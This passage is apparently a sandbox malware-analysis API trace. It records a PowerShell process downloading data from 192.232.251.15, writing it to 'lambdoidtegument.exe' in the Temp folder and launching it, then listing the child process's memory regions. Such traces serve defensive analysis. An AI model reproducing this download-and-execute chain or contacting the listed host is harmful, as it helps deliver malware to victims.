[0055.119] GetLastError () returned 0x2733 [0055.119] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x399978, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0055.119] GetLastError () returned 
0x2733 [0055.119] WSAEventSelect (s=0x4e4, hEventObject=0x4e8, lNetworkEvents=512) returned 0 [0055.119] GetLastError () returned 0x0 [0055.122] GetAdaptersAddresses () returned 0x6f [0055.125] LocalAlloc (uFlags=0x0, uBytes=0xa44) returned 0x51d6cb0 [0055.126] GetLastError () returned 0x0 [0055.126] GetAdaptersAddresses () returned 0x0 [0055.129] LocalFree (hMem=0x51d6cb0) returned 0x0 [0055.130] GetLastError () returned 0x0 [0055.138] WSAConnect (in: s=0x4cc, name=0x253a114*(sa_family=2, sin_port=0x50, sin_addr="192.232.251.15"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0055.325] GetLastError () returned 0x0 [0055.326] closesocket (s=0x4c8) returned 0 [0055.326] GetLastError () returned 0x0 [0055.329] send (in: s=0x4cc, buf=0x253b9e0*, len=71, flags=0 | out: buf=0x253b9e0*) returned 71 [0055.329] GetLastError () returned 0x0 [0055.331] setsockopt (s=0x4cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0055.331] GetLastError () returned 0x0 [0055.331] recv (in: s=0x4cc, buf=0x25372c8, len=4096, flags=0 | out: buf=0x25372c8*) returned 4096 [0055.522] GetLastError () returned 0x0 [0055.525] setsockopt (s=0x4cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0055.525] GetLastError () returned 0x0 [0055.525] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 8972 [0055.526] GetLastError () returned 0x0 [0055.526] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.527] GetLastError () returned 0x0 [0055.527] WriteFile (in: hFile=0x388, lpBuffer=0x253d972*, nNumberOfBytesToWrite=0x2222, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d972*, lpNumberOfBytesWritten=0x51cec40*=0x2222, lpOverlapped=0x0) returned 1 [0055.527] 
GetLastError () returned 0x0 [0055.528] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 3752 [0055.710] GetLastError () returned 0x0 [0055.710] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 3508 [0055.710] GetLastError () returned 0x0 [0055.710] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.711] GetLastError () returned 0x0 [0055.711] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 23232 [0055.901] GetLastError () returned 0x0 [0055.901] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.901] GetLastError () returned 0x0 [0055.901] WriteFile (in: hFile=0x388, lpBuffer=0x253dc2c*, nNumberOfBytesToWrite=0x571c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253dc2c*, lpNumberOfBytesWritten=0x51cec40*=0x571c, lpOverlapped=0x0) returned 1 [0055.902] GetLastError () returned 0x0 [0055.902] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 7260 [0055.902] GetLastError () returned 0x0 [0055.902] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x1c5c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x1c5c, lpOverlapped=0x0) returned 1 [0055.902] GetLastError () returned 0x0 [0055.902] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.902] GetLastError () returned 0x0 [0055.902] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.903] GetLastError () returned 0x0 
[0055.903] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 2904 [0055.903] GetLastError () returned 0x0 [0055.903] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.903] GetLastError () returned 0x0 [0055.903] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.904] GetLastError () returned 0x0 [0055.904] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0055.904] GetLastError () returned 0x0 [0055.904] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.904] GetLastError () returned 0x0 [0055.904] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0055.904] GetLastError () returned 0x0 [0055.904] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0055.904] GetLastError () returned 0x0 [0055.905] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 20328 [0056.091] GetLastError () returned 0x0 [0056.091] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.092] GetLastError () returned 0x0 [0056.092] WriteFile (in: hFile=0x388, lpBuffer=0x253e57c*, nNumberOfBytesToWrite=0x4274, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253e57c*, 
lpNumberOfBytesWritten=0x51cec40*=0x4274, lpOverlapped=0x0) returned 1 [0056.092] GetLastError () returned 0x0 [0056.092] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 5808 [0056.092] GetLastError () returned 0x0 [0056.092] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x16b0, lpOverlapped=0x0) returned 1 [0056.093] GetLastError () returned 0x0 [0056.093] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 1452 [0056.093] GetLastError () returned 0x0 [0056.093] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0056.093] GetLastError () returned 0x0 [0056.093] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.094] GetLastError () returned 0x0 [0056.094] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 17424 [0056.276] GetLastError () returned 0x0 [0056.276] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.276] GetLastError () returned 0x0 [0056.277] WriteFile (in: hFile=0x388, lpBuffer=0x253e1d8*, nNumberOfBytesToWrite=0x3ac0, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253e1d8*, lpNumberOfBytesWritten=0x51cec40*=0x3ac0, lpOverlapped=0x0) returned 1 [0056.277] GetLastError () returned 0x0 [0056.277] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0056.277] GetLastError () returned 0x0 [0056.277] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, 
nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x1104, lpOverlapped=0x0) returned 1 [0056.277] GetLastError () returned 0x0 [0056.277] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 30492 [0056.285] GetLastError () returned 0x0 [0056.285] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x771c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x771c, lpOverlapped=0x0) returned 1 [0056.285] GetLastError () returned 0x0 [0056.285] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0056.286] GetLastError () returned 0x0 [0056.286] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x1104, lpOverlapped=0x0) returned 1 [0056.286] GetLastError () returned 0x0 [0056.286] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 30492 [0056.469] GetLastError () returned 0x0 [0056.470] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x771c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x771c, lpOverlapped=0x0) returned 1 [0056.470] GetLastError () returned 0x0 [0056.471] recv (in: s=0x4cc, buf=0x253d888, len=54850, flags=0 | out: buf=0x253d888*) returned 15972 [0056.471] GetLastError () returned 0x0 [0056.471] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x3e64, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x3e64, lpOverlapped=0x0) returned 1 [0056.471] GetLastError () returned 0x0 [0056.471] recv (in: s=0x4cc, buf=0x253d888, len=38878, flags=0 | out: buf=0x253d888*) 
returned 2904 [0056.471] GetLastError () returned 0x0 [0056.471] recv (in: s=0x4cc, buf=0x253d888, len=35974, flags=0 | out: buf=0x253d888*) returned 24684 [0056.477] GetLastError () returned 0x0 [0056.477] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.477] GetLastError () returned 0x0 [0056.477] WriteFile (in: hFile=0x388, lpBuffer=0x253dd30*, nNumberOfBytesToWrite=0x5bc4, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253dd30*, lpNumberOfBytesWritten=0x51cec40*=0x5bc4, lpOverlapped=0x0) returned 1 [0056.478] GetLastError () returned 0x0 [0056.478] recv (in: s=0x4cc, buf=0x253d888, len=11290, flags=0 | out: buf=0x253d888*) returned 11290 [0056.659] GetLastError () returned 0x0 [0056.659] SetEvent (hEvent=0x3a8) returned 1 [0056.659] GetLastError () returned 0x0 [0056.659] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x2c1a, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x2c1a, lpOverlapped=0x0) returned 1 [0056.660] GetLastError () returned 0x0 [0056.660] CloseHandle (hObject=0x388) returned 1 [0056.662] GetLastError () returned 0x0 [0056.664] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce540, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0056.664] GetLastError () returned 0x0 [0056.664] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0056.664] GetLastError () returned 0x0 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.664] GetFileAttributesExW (in: 
lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), fInfoLevelId=0x0, lpFileInformation=0x25558d4 | out: lpFileInformation=0x25558d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3607670, ftCreationTime.dwHighDateTime=0x1d3799e, ftLastAccessTime.dwLowDateTime=0xa3607670, ftLastAccessTime.dwHighDateTime=0x1d3799e, ftLastWriteTime.dwLowDateTime=0xa47958b0, ftLastWriteTime.dwHighDateTime=0x1d3799e, nFileSizeHigh=0x0, nFileSizeLow=0x3a000)) returned 1 [0056.664] GetLastError () returned 0x0 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.665] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce828, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0056.666] GetLastError () returned 0x0 [0056.666] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0056.666] GetLastError () returned 0x0 [0056.666] SetErrorMode (uMode=0x1) returned 0x1 [0056.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), fInfoLevelId=0x0, lpFileInformation=0x51cecd0 | out: lpFileInformation=0x51cecd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3607670, ftCreationTime.dwHighDateTime=0x1d3799e, ftLastAccessTime.dwLowDateTime=0xa3607670, ftLastAccessTime.dwHighDateTime=0x1d3799e, ftLastWriteTime.dwLowDateTime=0xa47958b0, ftLastWriteTime.dwHighDateTime=0x1d3799e, nFileSizeHigh=0x0, nFileSizeLow=0x3a000)) returned 1 [0056.666] GetLastError () returned 0x0 [0056.666] SetErrorMode (uMode=0x1) returned 0x1 [0056.666] 
GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce7f0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0056.667] GetLastError () returned 0x0 [0056.667] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce818, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0056.667] GetLastError () returned 0x0 [0056.667] SetErrorMode (uMode=0x1) returned 0x1 [0056.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), fInfoLevelId=0x0, lpFileInformation=0x51cec98 | out: lpFileInformation=0x51cec98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3607670, ftCreationTime.dwHighDateTime=0x1d3799e, ftLastAccessTime.dwLowDateTime=0xa3607670, ftLastAccessTime.dwHighDateTime=0x1d3799e, ftLastWriteTime.dwLowDateTime=0xa47958b0, ftLastWriteTime.dwHighDateTime=0x1d3799e, nFileSizeHigh=0x0, nFileSizeLow=0x3a000)) returned 1 [0056.667] GetLastError () returned 0x0 [0056.667] SetErrorMode (uMode=0x1) returned 0x1 [0056.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.850] GetLastError () returned 0xcb [0056.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.882] GetLastError () returned 0xcb [0056.913] SHGetFileInfoA (in: pszPath="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwFileAttributes=0x0, psfi=0x399978, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x399978) returned 0x4004550 [0056.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.967] 
GetLastError () returned 0xcb [0056.968] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.968] GetLastError () returned 0x0 [0056.995] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.995] GetLastError () returned 0x0 [0057.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.002] GetLastError () returned 0xcb [0057.004] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x51ceda8 | out: pNumArgs=0x51ceda8) returned 0x30ed08*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" [0057.005] GetLastError () returned 0x0 [0057.005] LocalFree (hMem=0x30ed08) returned 0x0 [0057.007] GetConsoleTitleW (in: lpConsoleTitle=0x399978, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0057.007] GetLastError () returned 0x0 [0057.010] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x399978*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x255ceb8 | out: lpCommandLine="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", lpProcessInformation=0x255ceb8*(hProcess=0x4c8, hThread=0x388, dwProcessId=0xb84, dwThreadId=0xb88)) returned 1 [0057.012] GetLastError () returned 0x715 [0057.025] CloseHandle 
(hObject=0x388) returned 1 [0057.025] GetLastError () returned 0x715 [0057.025] SHGetFileInfoA (in: pszPath="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwFileAttributes=0x0, psfi=0x399978, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x399978) returned 0x4004550 [0057.028] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0057.028] GetLastError () returned 0x0 [0057.028] CloseHandle (hObject=0x4c8) returned 1 [0057.028] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x38c) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x384) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x3a0) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x36c) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x31c) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x390) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x2f8) returned 1 [0057.030] GetLastError () returned 0x0 [0057.031] SetEvent (hEvent=0x2fc) returned 1 [0057.031] GetLastError () returned 0x0 [0057.031] SetEvent (hEvent=0x32c) returned 1 [0057.031] GetLastError () returned 0x0 [0057.031] CoUninitialize () Thread: id = 61 os_tid = 0xb7c Thread: id = 62 os_tid = 0xb80 [0055.056] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0055.059] ResetEvent (hEvent=0x3a8) returned 1 [0055.059] GetLastError () returned 0x0 Thread: id = 64 os_tid = 0xb8c [0057.068] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0057.092] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.122] VirtualQuery (in: lpAddress=0x5e5e120, lpBuffer=0x5e5f120, dwLength=0x1c | out: lpBuffer=0x5e5f120*(BaseAddress=0x5e5e000, AllocationBase=0x54d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.122] 
VirtualQuery (in: lpAddress=0x5e5e23c, lpBuffer=0x5e5f23c, dwLength=0x1c | out: lpBuffer=0x5e5f23c*(BaseAddress=0x5e5e000, AllocationBase=0x54d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.123] SetEvent (hEvent=0x4c8) returned 1 [0057.123] GetLastError () returned 0x0 [0057.123] SetEvent (hEvent=0x388) returned 1 [0057.123] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4ec) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4c8) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x388) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x504) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4f8) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4fc) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x500) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x508) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] CoUninitialize () Process: id = "6" image_name = "lambdoidtegument.exe" filename = "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe" page_root = "0x7f1e66a0" os_pid = "0xb84" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb44" cmd_line = "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1004 
start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1005 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1006 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1007 start_va = 0x400000 end_va = 0x43afff entry_point = 0x400000 region_type = mapped_file name = "lambdoidtegument.exe" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe") Region: id = 1008 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1009 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1010 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1011 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1012 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1013 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1014 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 1015 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1016 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1017 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\System32\\msvbvm60.dll" (normalized: "c:\\windows\\system32\\msvbvm60.dll") Region: id = 1018 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1019 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1020 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1021 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1022 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1023 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1024 start_va = 0x76620000 end_va = 0x766e8fff 
